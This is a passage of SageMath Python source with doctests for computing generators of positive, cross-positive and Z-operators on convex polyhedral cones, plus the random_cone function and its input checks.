sage: K2.contains(P*K1.random_element(ring=QQ))
True
The lineality space of the dual of the positive operators
can be computed from the lineality spaces of the cone and
its dual [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(K.lattice_dim()**2)
sage: pi_cone = Cone(( g.list() for g in pi_gens ),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.dual().linear_subspace()
sage: U1 = [ vector((s.tensor_product(x)).list())
....: for x in K.lines()
....: for s in K.dual() ]
sage: U2 = [ vector((s.tensor_product(x)).list())
....: for x in K
....: for s in K.dual().lines() ]
sage: expected = pi_cone.lattice().vector_space().span(U1+U2)
sage: actual == expected
True
The lineality of the dual of the positive operators is known
from its lineality space [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: n = K.lattice_dim()
sage: m = K.dim()
sage: l = K.lineality()
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(n**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.dual().lineality()
sage: expected = l*(m - l) + m*(n - m)
sage: actual == expected
True
The dimension of the positive operators on a cone depends on the
dimension and lineality of that cone [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: n = K.lattice_dim()
sage: m = K.dim()
sage: l = K.lineality()
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(n**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.dim()
sage: expected = n**2 - l*(m - l) - (n - m)*m
sage: actual == expected
True
The trivial cone, full space, and half-plane all give rise to the
expected dimensions [Or2018b]_::
sage: n = ZZ.random_element(5)
sage: K = cones.trivial(n)
sage: L = ToricLattice(n^2)
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.dim() == n^2
True
sage: K = K.dual()
sage: K.is_full_space()
True
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.dim() == n^2
True
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: check=False)
sage: pi_cone.dim() == 3
True
The lineality of the positive operators follows from the
description of its generators [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: n = K.lattice_dim()
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(n**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.lineality()
sage: expected = n**2 - K.dim()*K.dual().dim()
sage: actual == expected
True
The trivial cone, full space, and half-plane all give rise to
the expected linealities [Or2018b]_::
sage: n = ZZ.random_element(5)
sage: K = cones.trivial(n)
sage: L = ToricLattice(n^2)
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.lineality() == n^2
True
sage: K = K.dual()
sage: K.is_full_space()
True
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.lineality() == n^2
True
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens), check=False)
sage: pi_cone.lineality() == 2
True
A cone is proper if and only if its positive operators form a
proper cone [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(K.lattice_dim()**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: K.is_proper() == pi_cone.is_proper()
True
The positive operators on a permuted cone can be obtained by
conjugation::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: L = ToricLattice(K.lattice_dim()**2)
sage: p = SymmetricGroup(K.lattice_dim()).random_element().matrix()
sage: pK = Cone(( p*k for k in K ), K.lattice(), check=False)
sage: pi_gens = pK.positive_operators_gens()
sage: actual = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_gens = K.positive_operators_gens()
sage: expected = Cone(((p*g*p.inverse()).list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual.is_equivalent(expected)
True
An operator is positive from one cone to another if and only if
its adjoint is positive from the dual of the second cone to the
dual of the first::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3)
sage: K2 = random_cone(max_ambient_dim=3)
sage: F = K1.lattice().vector_space().base_field()
sage: n = K1.lattice_dim()
sage: m = K2.lattice_dim()
sage: L = ToricLattice(n*m)
sage: W = VectorSpace(F, n*m)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: pi_fwd = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_gens = K2.dual().positive_operators_gens(K1.dual())
sage: pi_back = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: M_fwd = MatrixSpace(F, m, n)
sage: M_back = MatrixSpace(F, n, m)
sage: L = M_fwd(pi_fwd.random_element(ring=QQ).list())
sage: pi_back.contains(W(L.transpose().list()))
True
sage: L = M_back(pi_back.random_element(ring=QQ).list())
sage: pi_fwd.contains(W(L.transpose().list()))
True
The Lyapunov rank of the positive operators is the product of
the Lyapunov ranks of the associated cones if both are proper
[Or2018a]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: K2 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: L = ToricLattice(K1.lattice_dim() * K2.lattice_dim())
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: beta1 = K1.lyapunov_rank()
sage: beta2 = K2.lyapunov_rank()
sage: pi_cone.lyapunov_rank() == beta1*beta2
True
Lyapunov-like operators on a proper polyhedral positive operator
cone can be computed from the Lyapunov-like operators on the cones
with respect to which the operators are positive [Or2018a]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: K2 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: F = K1.lattice().base_field()
sage: m = K1.lattice_dim()
sage: n = K2.lattice_dim()
sage: L = ToricLattice(m*n)
sage: M1 = MatrixSpace(F, m, m)
sage: M2 = MatrixSpace(F, n, n)
sage: tps = ( M2(s.list()).tensor_product(M1(x.list()))
....: for x in K1.dual().lyapunov_like_basis()
....: for s in K2.lyapunov_like_basis() )
sage: W = VectorSpace(F, (m**2)*(n**2))
sage: expected = span(F, ( W(x.list()) for x in tps ))
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: LL_pi = pi_cone.lyapunov_like_basis()
sage: actual = span(F, ( W(x.list()) for x in LL_pi ))
sage: actual == expected
True
"""
if K2 is None:
K2 = self
# Matrices are not vectors in Sage, so we have to convert them
# to vectors explicitly before we can find a basis. We need these
# two values to construct the appropriate "long vector" space.
F = self.lattice().base_field()
n = self.lattice_dim()
m = K2.lattice_dim()
tensor_products = ( s.tensor_product(x) for x in self
for s in K2.dual() )
# Convert those tensor products to long vectors.
W = VectorSpace(F, n*m)
vectors = ( W(tp.list()) for tp in tensor_products )
check = True
if self.is_proper() and K2.is_proper():
# All of the generators involved are extreme vectors and
# therefore minimal. If this cone is neither solid nor
# strictly convex, then the tensor product of ``s`` and ``x``
# is the same as that of ``-s`` and ``-x``. However, as a
# /set/, ``tensor_products`` may still be minimal.
check = False
# Create the dual cone of the positive operators, expressed as
# long vectors.
pi_dual = Cone(vectors, ToricLattice(W.dimension()), check=check)
# Now compute the desired cone from its dual...
pi_cone = pi_dual.dual()
# And finally convert its rays back to matrix representations.
M = MatrixSpace(F, m, n)
return [ M(v.list()) for v in pi_cone ]
def cross_positive_operators_gens(self):
r"""
Compute minimal generators of the cross-positive operators on this
cone.
Any positive operator `P` on this cone will have `s(P(x)) \ge 0`
whenever `x` is an element of this cone and `s` is an element of
its dual. By contrast, the cross-positive operators need only
satisfy that property on the :meth:`discrete_complementarity_set`;
that is, when `x` and `s` are "cross" (orthogonal).
The cross-positive operators (on some fixed cone) themselves
form a closed convex cone. This method computes and returns
the generators of that cone as a list of matrices.
Cross-positive operators are also called exponentially-positive,
since they become positive operators when exponentiated. Other
equivalent names are resolvent-positive, essentially-positive,
and quasimonotone.
OUTPUT:
A list of `n`-by-`n` matrices where `n` is the ambient dimension
of this cone. Each matrix `L` in the list has the property that
`s(L(x)) \ge 0` whenever `(x,s)` is an element of this cone's
:meth:`discrete_complementarity_set`.
The returned matrices generate the cone of cross-positive operators
on this cone; that is,
- Any nonnegative linear combination of the returned matrices
is cross-positive on this cone.
- Every cross-positive operator on this cone is some nonnegative
linear combination of the returned matrices.
.. SEEALSO::
:meth:`lyapunov_like_basis`,
:meth:`positive_operators_gens`,
:meth:`Z_operators_gens`
REFERENCES:
- [SV1970]_
- [Or2018b]_
EXAMPLES:
Cross-positive operators on the nonnegative orthant are
negations of Z-matrices; that is, matrices whose off-diagonal
elements are nonnegative::
sage: K = cones.nonnegative_orthant(2)
sage: K.cross_positive_operators_gens()
[
[0 1] [0 0] [1 0] [-1 0] [0 0] [ 0 0]
[0 0], [1 0], [0 0], [ 0 0], [0 1], [ 0 -1]
]
sage: K = Cone([(1,0,0,0),(0,1,0,0),(0,0,1,0),(0,0,0,1)])
sage: all( c[i][j] >= 0 for c in K.cross_positive_operators_gens()
....: for i in range(c.nrows())
....: for j in range(c.ncols())
....: if i != j )
True
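A concrete cross-positive operator (an illustrative check): the
coordinate swap maps the quadrant into itself, so it is positive and
hence also cross-positive::
sage: K = cones.nonnegative_orthant(2)
sage: M = matrix(QQ, [[0,1],[1,0]])
sage: M.is_cross_positive_on(K)
True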
The trivial cone in a trivial space has no cross-positive
operators::
sage: K = cones.trivial(0)
sage: K.cross_positive_operators_gens()
[]
Every operator is a cross-positive operator on the ambient
vector space::
sage: K = Cone([(1,),(-1,)])
sage: K.is_full_space()
True
sage: K.cross_positive_operators_gens()
[[1], [-1]]
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: K.cross_positive_operators_gens()
[
[1 0] [-1 0] [0 1] [ 0 -1] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
A non-obvious application is to find the cross-positive
operators on the right half-plane [Or2018b]_::
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: K.cross_positive_operators_gens()
[
[1 0] [-1 0] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
Cross-positive operators on a subspace are Lyapunov-like and
vice-versa::
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: lls = span( vector(l.list())
....: for l in K.lyapunov_like_basis() )
sage: cs = span( vector(c.list())
....: for c in K.cross_positive_operators_gens() )
sage: cs == lls
True
TESTS:
The cross-positive property is possessed by every cross-positive
operator::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: cp_gens = K.cross_positive_operators_gens()
sage: all( L.is_cross_positive_on(K) for L in cp_gens )
True
The lineality space of the cone of cross-positive operators is
the space of Lyapunov-like operators [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: L = ToricLattice(K.lattice_dim()**2)
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: ll_basis = ( vector(l.list())
....: for l in K.lyapunov_like_basis() )
sage: lls = L.vector_space().span(ll_basis)
sage: cp_cone.linear_subspace() == lls
True
The lineality spaces of the duals of the positive and cross-
positive operator cones are equal. From this it follows that
the dimensions of the cross-positive operator cone and positive
operator cone are equal [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: pi_gens = K.positive_operators_gens()
sage: cp_gens = K.cross_positive_operators_gens()
sage: L = ToricLattice(K.lattice_dim()**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.dim() == cp_cone.dim()
True
sage: pi_star = pi_cone.dual()
sage: cp_star = cp_cone.dual()
sage: pi_star.linear_subspace() == cp_star.linear_subspace()
True
The trivial cone, full space, and half-plane all give rise to
the expected dimensions [Or2018b]_::
sage: n = ZZ.random_element(5)
sage: K = cones.trivial(n)
sage: L = ToricLattice(n^2)
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_cone.dim() == n^2
True
sage: K = K.dual()
sage: K.is_full_space()
True
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_cone.dim() == n^2
True
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone(( g.list() for g in cp_gens ), check=False)
sage: cp_cone.dim() == 3
True
The cross-positive operators of a permuted cone can be obtained by
conjugation::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: L = ToricLattice(K.lattice_dim()**2)
sage: p = SymmetricGroup(K.lattice_dim()).random_element().matrix()
sage: pK = Cone(( p*k for k in K ), K.lattice(), check=False)
sage: cp_gens = pK.cross_positive_operators_gens()
sage: actual = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_gens = K.cross_positive_operators_gens()
sage: expected = Cone(((p*g*p.inverse()).list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: actual.is_equivalent(expected)
True
An operator is cross-positive on a cone if and only if its
adjoint is cross-positive on the dual of that cone [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: F = K.lattice().vector_space().base_field()
sage: n = K.lattice_dim()
sage: L = ToricLattice(n**2)
sage: W = VectorSpace(F, n**2)
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_gens = K.dual().cross_positive_operators_gens()
sage: cp_star = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: M = MatrixSpace(F, n)
sage: L = M(cp_cone.random_element(ring=QQ).list())
sage: cp_star.contains(W(L.transpose().list()))
True
sage: L = M(cp_star.random_element(ring=QQ).list())
sage: cp_cone.contains(W(L.transpose().list()))
True
"""
# Matrices are not vectors in Sage, so we have to convert them
# to vectors explicitly before we can find a basis. We need these
# two values to construct the appropriate "long vector" space.
F = self.lattice().base_field()
n = self.lattice_dim()
# These tensor products contain generators for the dual cone of
# the cross-positive operators.
tensor_products = ( s.tensor_product(x)
for (x,s) in self.discrete_complementarity_set() )
# Turn our matrices into long vectors...
W = VectorSpace(F, n**2)
vectors = ( W(m.list()) for m in tensor_products )
check = True
if self.is_proper():
# All of the generators involved are extreme vectors and
# therefore minimal. If this cone is neither solid nor
# strictly convex, then the tensor product of ``s`` and
# ``x`` is the same as that of ``-s`` and ``-x``. However,
# as a /set/, ``tensor_products`` may still be minimal.
check = False
# Create the dual cone of the cross-positive operators,
# expressed as long vectors.
cp_dual = Cone(vectors,
lattice=ToricLattice(W.dimension()),
check=check)
# Now compute the desired cone from its dual...
cp_cone = cp_dual.dual()
# And finally convert its rays back to matrix representations.
M = MatrixSpace(F, n)
return [ M(v.list()) for v in cp_cone ]
def Z_operators_gens(self):
r"""
Compute minimal generators of the Z-operators on this cone.
The Z-operators on a cone generalize the Z-matrices over the
nonnegative orthant. They are simply negations of the
:meth:`cross_positive_operators_gens`.
OUTPUT:
A list of `n`-by-`n` matrices where `n` is the ambient dimension
of this cone. Each matrix `L` in the list has the property that
`s(L(x)) \le 0` whenever `(x,s)` is an element of this cone's
:meth:`discrete_complementarity_set`.
The returned matrices generate the cone of Z-operators on this
cone; that is,
- Any nonnegative linear combination of the returned matrices
is a Z-operator on this cone.
- Every Z-operator on this cone is some nonnegative linear
combination of the returned matrices.
.. SEEALSO::
:meth:`cross_positive_operators_gens`,
:meth:`lyapunov_like_basis`,
:meth:`positive_operators_gens`
REFERENCES:
- [BP1994]_
- [Or2018b]_
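EXAMPLES:
On the nonnegative quadrant, the Z-operators are exactly the
Z-matrices -- matrices whose off-diagonal entries are nonpositive --
so the generators have nonpositive off-diagonal entries (an
illustrative check mirroring the cross-positive example)::
sage: K = cones.nonnegative_orthant(2)
sage: all( M[i][j] <= 0 for M in K.Z_operators_gens()
....: for i in range(M.nrows())
....: for j in range(M.ncols())
....: if i != j )
True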
TESTS:
The Z-property is possessed by every Z-operator::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: Z_gens = K.Z_operators_gens()
sage: all( L.is_Z_operator_on(K) for L in Z_gens )
True
"""
return [ -cp for cp in self.cross_positive_operators_gens() ]
def random_cone(lattice=None, min_ambient_dim=0, max_ambient_dim=None,
min_rays=0, max_rays=None, strictly_convex=None, solid=None):
r"""
Generate a random convex rational polyhedral cone.
Lower and upper bounds may be provided for both the dimension of the
ambient space and the number of generating rays of the cone. If a
lower bound is left unspecified, it defaults to zero. Unspecified
upper bounds will be chosen randomly, unless you set ``solid``, in
which case they are chosen a little more wisely.
You may specify the ambient ``lattice`` for the returned cone. In
that case, ``min_ambient_dim`` is ignored, and passing
``max_ambient_dim`` raises a ``ValueError`` (the lattice already
fixes the ambient dimension).
You may also request that the returned cone be strictly convex (or
not). Likewise you may request that it be (non-)solid.
.. WARNING::
If you request a large number of rays in a low-dimensional
space, you might be waiting for a while. For example, in three
dimensions, it is possible to obtain an octagon raised up to height
one (all z-coordinates equal to one). But in practice, we usually
generate the entire three-dimensional space with six rays before we
get to the eight rays needed for an octagon. We therefore have to
throw the cone out and start over from scratch. This process repeats
until we get lucky.
We also refrain from "adjusting" the min/max parameters given to
us when a (non-)strictly convex or (non-)solid cone is
requested. This means that it may take a long time to generate
such a cone if the parameters are chosen unwisely.
For example, you may want to set ``min_rays`` close to
``min_ambient_dim`` if you desire a solid cone. Or, if you desire a
non-strictly-convex cone, note that every such cone has at least two
generating rays, so two is a sensible value for ``min_rays``.
INPUT:
* ``lattice`` (default: random) -- A ``ToricLattice`` object in
which the returned cone will live. By default a new lattice will
be constructed with a randomly-chosen rank (subject to
``min_ambient_dim`` and ``max_ambient_dim``).
* ``min_ambient_dim`` (default: zero) -- A nonnegative integer
representing the minimum dimension of the ambient lattice.
* ``max_ambient_dim`` (default: random) -- A nonnegative integer
representing the maximum dimension of the ambient lattice.
* ``min_rays`` (default: zero) -- A nonnegative integer representing
the minimum number of generating rays of the cone.
* ``max_rays`` (default: random) -- A nonnegative integer representing
the maximum number of generating rays of the cone.
* ``strictly_convex`` (default: random) -- Whether or not to make the
returned cone strictly convex. Specify ``True`` for a strictly convex
cone, ``False`` for a non-strictly-convex cone, or ``None`` if you
don't care.
* ``solid`` (default: random) -- Whether or not to make the returned
cone solid. Specify ``True`` for a solid cone, ``False`` for a
non-solid cone, or ``None`` if you don't care.
OUTPUT:
A new, randomly generated cone.
A ``ValueError`` will be thrown under the following conditions:
* Any of ``min_ambient_dim``, ``max_ambient_dim``, ``min_rays``, or
``max_rays`` are negative.
* ``max_ambient_dim`` is less than ``min_ambient_dim``.
* ``max_rays`` is less than ``min_rays``.
* Both ``max_ambient_dim`` and ``lattice`` are specified.
* ``min_rays`` is greater than four but ``max_ambient_dim`` is less than
three.
* ``min_rays`` is greater than four but ``lattice`` has dimension
less than three.
* ``min_rays`` is greater than two but ``max_ambient_dim`` is less than
two.
* ``min_rays`` is greater than two but ``lattice`` has dimension less
than two.
* ``min_rays`` is positive but ``max_ambient_dim`` is zero.
* ``min_rays`` is positive but ``lattice`` has dimension zero.
* A trivial lattice is supplied and a non-strictly-convex cone
is requested.
* A non-strictly-convex cone is requested but ``max_rays`` is less
than two.
* A solid cone is requested but ``max_rays`` is less than
``min_ambient_dim``.
* A solid cone is requested but ``max_rays`` is less than the
dimension of ``lattice``.
* A non-solid cone is requested but ``max_ambient_dim`` is zero.
* A non-solid cone is requested but ``lattice`` has dimension zero.
* A non-solid cone is requested but ``min_rays`` is so large that
it guarantees a solid cone.
ALGORITHM:
First, a lattice is determined from ``min_ambient_dim`` and
``max_ambient_dim`` (or from the supplied ``lattice``).
Then, lattice elements are generated one at a time and added to a
cone. This continues until either the cone meets the user's
requirements, or the cone is equal to the entire space (at which
point it is futile to generate more).
We check whether or not the resulting cone meets the user's
requirements; if it does, it is returned. If not, we throw it away
and start over. This process repeats indefinitely until an
appropriate cone is generated.
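In simplified pseudocode, this is the generate-and-test loop
implemented below (the strictly-convex/solid adjustments and the
ray-count heuristics are omitted from this sketch)::
    while True:
        d = random_min_max(min_ambient_dim, max_ambient_dim)
        L = lattice or ToricLattice(d)
        r = random_min_max(min_rays, max_rays)
        K = Cone([L.random_element() for i in range(r)], lattice=L)
        if is_valid(K):
            return K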
EXAMPLES:
Generate a trivial cone in a trivial space::
sage: set_random_seed()
sage: random_cone(max_ambient_dim=0, max_rays=0)
0-d cone in 0-d lattice N
We can predict the ambient dimension when
``min_ambient_dim == max_ambient_dim``::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=4, max_ambient_dim=4)
sage: K.lattice_dim()
4
Likewise for the number of rays when ``min_rays == max_rays``::
sage: set_random_seed()
sage: K = random_cone(min_rays=3, max_rays=3)
sage: K.nrays()
3
If we specify a lattice, then the returned cone will live in it::
sage: set_random_seed()
sage: L = ToricLattice(5, "L")
sage: K = random_cone(lattice=L)
sage: K.lattice() is L
True
We can also request a strictly convex cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, max_rays=10,
....: strictly_convex=True)
sage: K.is_strictly_convex()
True
Or one that isn't strictly convex::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=5, min_rays=2,
....: strictly_convex=False)
sage: K.is_strictly_convex()
False
An example with all parameters set::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=4, max_ambient_dim=7,
....: min_rays=2, max_rays=10,
....: strictly_convex=False, solid=True)
sage: 4 <= K.lattice_dim() and K.lattice_dim() <= 7
True
sage: 2 <= K.nrays() and K.nrays() <= 10
True
sage: K.is_strictly_convex()
False
sage: K.is_solid()
True
TESTS:
It's hard to test the output of a random process, but we can at
least make sure that we get a cone back::
sage: set_random_seed()
sage: from sage.geometry.cone import is_Cone
sage: K = random_cone(max_ambient_dim=6, max_rays=10)
sage: is_Cone(K)
True
The upper/lower bounds are respected::
sage: set_random_seed()
sage: K = random_cone(min_ambient_dim=5, max_ambient_dim=8,
....: min_rays=3, max_rays=4)
sage: 5 <= K.lattice_dim() and K.lattice_dim() <= 8
True
sage: 3 <= K.nrays() and K.nrays() <= 4
True
Ensure that an exception is raised when either lower bound is greater
than its respective upper bound::
sage: set_random_seed()
sage: random_cone(min_ambient_dim=5, max_ambient_dim=2)
Traceback (most recent call last):
...
ValueError: max_ambient_dim cannot be less than min_ambient_dim.
sage: random_cone(min_rays=5, max_rays=2)
Traceback (most recent call last):
...
ValueError: max_rays cannot be less than min_rays.
Or if we specify both ``max_ambient_dim`` and ``lattice``::
sage: set_random_seed()
sage: L = ToricLattice(5, "L")
sage: random_cone(lattice=L, max_ambient_dim=10)
Traceback (most recent call last):
...
ValueError: max_ambient_dim cannot be specified when a lattice is
provided.
If the user requests too many rays in zero, one, or two dimensions,
a ``ValueError`` is thrown::
sage: set_random_seed()
sage: random_cone(max_ambient_dim=0, min_rays=1)
Traceback (most recent call last):
...
ValueError: all cones in zero dimensions have no generators.
Please increase max_ambient_dim to at least 1, or decrease min_rays.
sage: random_cone(max_ambient_dim=1, min_rays=3)
Traceback (most recent call last):
...
ValueError: all cones in zero/one dimensions have two or fewer
generators. Please increase max_ambient_dim to at least 2, or decrease
min_rays.
sage: random_cone(max_ambient_dim=2, min_rays=5)
Traceback (most recent call last):
...
ValueError: all cones in zero/one/two dimensions have four or fewer
generators. Please increase max_ambient_dim to at least 3, or decrease
min_rays.
sage: L = ToricLattice(0)
sage: random_cone(lattice=L, min_rays=1)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice have no generators.
Please decrease min_rays.
sage: L = ToricLattice(1)
sage: random_cone(lattice=L, min_rays=3)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice have two or fewer
generators. Please decrease min_rays.
sage: L = ToricLattice(2)
sage: random_cone(lattice=L, min_rays=5)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice have four or fewer
generators. Please decrease min_rays.
Ensure that we can obtain a cone in three dimensions with a large
number (in particular, more than 2*dim) rays. The ``max_rays`` is
not strictly necessary, but it minimizes the number of times that
we will loop with an absurd, unattainable number of rays::
sage: set_random_seed() # long time
sage: K = random_cone(min_ambient_dim=3, # long time
....: max_ambient_dim=3, # long time
....: min_rays=7, # long time
....: max_rays=9) # long time
sage: K.nrays() >= 7 # long time
True
sage: K.lattice_dim() # long time
3
We need three dimensions to obtain five rays; we should throw out
cones in zero/one/two dimensions until we get lucky::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3, min_rays=5)
sage: K.nrays() >= 5
True
sage: K.lattice_dim()
3
It is an error to request a non-strictly-convex trivial cone::
sage: set_random_seed()
sage: L = ToricLattice(0,"L")
sage: random_cone(lattice=L, strictly_convex=False)
Traceback (most recent call last):
...
ValueError: all cones in this lattice are strictly convex (trivial).
Or a non-strictly-convex cone with fewer than two rays::
sage: set_random_seed()
sage: random_cone(max_rays=1, strictly_convex=False)
Traceback (most recent call last):
...
ValueError: all cones are strictly convex when ``max_rays`` is
less than two.
But fine to ask for a strictly convex trivial cone::
sage: set_random_seed()
sage: L = ToricLattice(0,"L")
sage: random_cone(lattice=L, strictly_convex=True)
0-d cone in 0-d lattice L
A ``ValueError`` is thrown if a non-solid cone is requested in a
zero-dimensional lattice::
sage: set_random_seed()
sage: L = ToricLattice(0)
sage: random_cone(lattice=L, solid=False)
Traceback (most recent call last):
...
ValueError: all cones in the given lattice are solid.
sage: random_cone(max_ambient_dim=0, solid=False)
Traceback (most recent call last):
...
ValueError: all cones are solid when max_ambient_dim is zero.
A ``ValueError`` is thrown if a solid cone is requested but the
maximum number of rays is too few::
sage: set_random_seed()
sage: random_cone(min_ambient_dim=4, max_rays=3, solid=True)
Traceback (most recent call last):
...
ValueError: max_rays must be at least min_ambient_dim for a solid cone.
sage: L = ToricLattice(5)
sage: random_cone(lattice=L, max_rays=3, solid=True)
Traceback (most recent call last):
...
ValueError: max_rays must be at least 5 for a solid cone in this
lattice.
A ``ValueError`` is thrown if a non-solid cone is requested but
``min_rays`` guarantees a solid cone::
sage: set_random_seed()
sage: random_cone(max_ambient_dim=4, min_rays=10, solid=False)
Traceback (most recent call last):
...
ValueError: every cone is solid when min_rays > 2*(max_ambient_dim - 1).
sage: L = ToricLattice(4)
sage: random_cone(lattice=L, min_rays=10, solid=False)
Traceback (most recent call last):
...
ValueError: every cone is solid when min_rays > 2*(d - 1) where d
is the dimension of the given lattice.
"""
# Catch obvious mistakes so that we can generate clear error
# messages.
if min_ambient_dim < 0:
raise ValueError('min_ambient_dim must be nonnegative.')
if min_rays < 0:
raise ValueError('min_rays must be nonnegative.')
if max_ambient_dim is not None:
if max_ambient_dim < 0:
raise ValueError('max_ambient_dim must be nonnegative.')
if (max_ambient_dim < min_ambient_dim):
msg = 'max_ambient_dim cannot be less than min_ambient_dim.'
raise ValueError(msg)
if lattice is not None:
msg = 'max_ambient_dim cannot be specified when a lattice is '
msg += 'provided.'
raise ValueError(msg)
# The next three checks prevent an infinite loop (a futile
# search for more rays) in zero, one, or two dimensions.
if min_rays > 4 and max_ambient_dim < 3:
msg = 'all cones in zero/one/two dimensions have four or fewer '
msg += 'generators. Please increase max_ambient_dim to at least '
msg += '3, or decrease min_rays.'
raise ValueError(msg)
if min_rays > 2 and max_ambient_dim < 2:
msg = 'all cones in zero/one dimensions have two or fewer '
msg += 'generators. Please increase max_ambient_dim to at least '
msg += '2, or decrease min_rays.'
raise ValueError(msg)
if min_rays > 0 and max_ambient_dim == 0:
msg = 'all cones in zero dimensions have no generators. '
msg += 'Please increase max_ambient_dim to at least 1, or '
msg += 'decrease min_rays.'
raise ValueError(msg)
if max_rays is not None:
if max_rays < 0:
raise ValueError('max_rays must be nonnegative.')
if (max_rays < min_rays):
raise ValueError('max_rays cannot be less than min_rays.')
# Also perform the "futile search" checks when a lattice is given,
# using its dimension rather than max_ambient_dim as the indicator.
if lattice is not None:
if min_rays > 4 and lattice.dimension() < 3:
msg = 'all cones in the given lattice have four or fewer '
msg += 'generators. Please decrease min_rays.'
raise ValueError(msg)
if min_rays > 2 and lattice.dimension() < 2:
msg = 'all cones in the given lattice have two or fewer '
msg += 'generators. Please decrease min_rays.'
raise ValueError(msg)
if min_rays > 0 and lattice.dimension() == 0:
msg = 'all cones in the given lattice have no generators. '
msg += 'Please decrease min_rays.'
raise ValueError(msg)
# Sanity checks for strictly_convex.
if strictly_convex is not None and not strictly_convex:
if lattice is not None and lattice.dimension() == 0:
msg = 'all cones in this lattice are strictly convex (trivial).'
raise ValueError(msg)
